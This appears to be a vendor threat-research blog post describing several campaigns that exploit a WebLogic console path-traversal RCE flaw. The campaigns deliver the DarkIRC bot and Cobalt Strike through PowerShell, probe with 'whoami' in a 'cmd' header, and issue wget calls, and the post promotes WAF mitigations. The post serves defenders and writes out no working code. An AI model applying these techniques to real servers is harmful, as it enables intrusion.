Recently a new unauthenticated remote code execution vulnerability was disclosed in Oracle WebLogic server. А path traversal vulnerability in the URL allowed smuggling unauthenticated requests to management portal console, invoking dangerous Java classes which resulted in executing shell commands on the server. Additional information regarding the vulnerability and it’s mitigation with attack signatures is available in our previous article on the matter.
As expected, the exploitation simplicity of this vulnerability allowed different threat actors to immediately adopt it in their arsenal.
Since the vulnerability was published, F5 Threat Research Team observed at least 5 distinct campaigns, which were also mentioned by the different sources.
Following are several of the campaigns and their mitigation with Advanced WAF Threat Campaigns feed.
In the most recent campaign, analyzed in detail by Juniper research team, threat actors leverage this vulnerability to distribute the DarkIRC bot. According to the article this bot is currently being sold on hack forums for $75USD.
Figure: Threat Campaign mitigating an attempt to execute a PowerShell command on WebLogic Server
Oracle WebLogic Console Path Traversal RCE - Z8qZ
In this campaign, following a successful exploitation of the WebLogic server, attackers were executing obfuscated PowerShell spearhead script to drop an agent of the Cobalt Strike exploitation framework, which is a legitimate penetration testing tool, however known also to be used by many notorious APT groups. This campaign was analyzed in details by Suns research team.
Figure: List of known APT groups using Cobalt Strike in their attacks (Taken from MITRE ATT&CK)
Figure: Threat Campaign mitigating an attempt deploying Cobalt Strike payload on WebLogic Server
This campaign is probing for vulnerable WebLogic servers by issuing a “whoami” command in a custom “cmd” header. The way attacker is executing the command is quite interesting. usually the exploit payload is being directly executed, however this time the exploit code strangely takes the payload from the “cmd” header.
Figure: Threat Campaign mitigating an attempt executing OS command on WebLogic Server
This campaign is probing for vulnerable server by issuing a GET request to a remote server.
This campaign is part of a broader operation which targets additional popular systems with publicly available exploits, such as:
Oracle WebLogic Console Path Traversal RCE
Oracle WebLogic WLS Security Component RCE
Plone Zope SAXutils Command Execution
JAWS Web Server Remote Code Execution
ThinkPHP Remote Code Execution
ElasticSearch Search Groovy Sandbox Bypass
Figure: Threat Campaign mitigating an attempt to execute “wget” command on WebLogic Server
Advanced WAF Threat Campaigns allow customers to detect and mitigate web vulnerabilities which are actively exploited by adversaries, without false positives and with an additional context of the attack.